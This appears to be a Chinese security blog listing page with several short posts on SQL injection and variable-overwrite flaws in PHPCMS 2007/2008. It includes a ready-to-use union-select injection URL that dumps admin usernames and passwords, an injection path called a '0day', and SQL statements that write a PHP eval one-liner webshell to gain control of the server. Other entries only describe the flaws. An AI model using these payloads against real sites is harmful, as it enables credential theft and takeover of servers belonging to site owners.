PHPCMS 2007 SQL注入和变量覆盖漏洞

作者:admin 日期:2010-06-15

PHPCMS是一款基于 PHP+Mysql 架构的网站内容管理系统，也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发，功能易用便于扩展，可面向大中型站点提供重量级网站建设解决方案。

PHPCMS 2007网站管理系统common.inc.php页面变量覆盖漏洞

在文件incude/common.inc.php中：

Tags: phpcms phpcms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 27

phpcms 2.0 GBK Help.php SQL注入漏洞

作者:admin 日期:2010-06-12

影响版本:
phpmps 2.0 GBK漏洞描述:
Phpcms 是国内领先的网站内容管理系统，同时也是一个开源的PHP开发框架。Phpcms由内容模型、会员、问吧、专题、财务、订单、广告、邮件订阅、短消息、自定义表单、全站搜索等20多个功能模块组成，内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 采用模块化开发，支持自定义内容模型和会员模型，并且可以自定义字段。

Help.php 文件，取得keywords的值，只用trim函数，去除了首位空，直接带入sql查询

Tags: phpcms phpcms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 27

phpcms2008 sp3通杀0day

作者:admin 日期:2010-05-02

此漏洞半年前已由dindle发布在海洋顶端，所以转载请著名来源
注入
yp/company.php?where=%23
进入后台访问

Tags: phpcms phpcms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 47

phpcms2008 search.php SQL注入漏洞

作者:admin 日期:2010-03-02

phpcms2008 search.php SQL注入漏洞(未经测试)
EXP:

http://www.sitedir.com.cn/member/search.php?username=admin&dosubmit=%C1%A2%BC%B4%CB%D1%CB%F7&mod=member&file=&action=&disabled=0/**/and/**/1=2/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20phpcms_member%20where%20groupid=1/*

Tags: phpcms phpcms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 54

phpcms 2007 GBK版0day注射扫描脚本

作者:admin 日期:2009-03-18

作者：TheLostMind
本来比较忙，想整个站，发现这个0DAY还是很好的，写了个脚本自动扫描存在了漏洞的站点，至于说自动注射出帐号密码，还是不要了，不装X了。
网上看了下，貌似是零客网安0.S.T的“小蟑螂”大哥发现的~~
漏洞产生在member/member.php的第4行，代码如下：

Tags: phpcms phpcms 0day 0day 注射注射

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 79

PHPCMS2008 后台拿webshell

作者:admin 日期:2009-03-16

进去后
Create TABLE b (cmd text NOT NULL);
Insert INTO b (cmd) VALUES('<?php @eval($_POST[xh4t]);?>');
//在字段cmd中插入一句话木马，木马内容为<?php @eval($_POST[xh4t]);?>
前3句都尅执行成功最后一句执行后显示空白

Tags: phpcms phpcms webshell webshell

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 204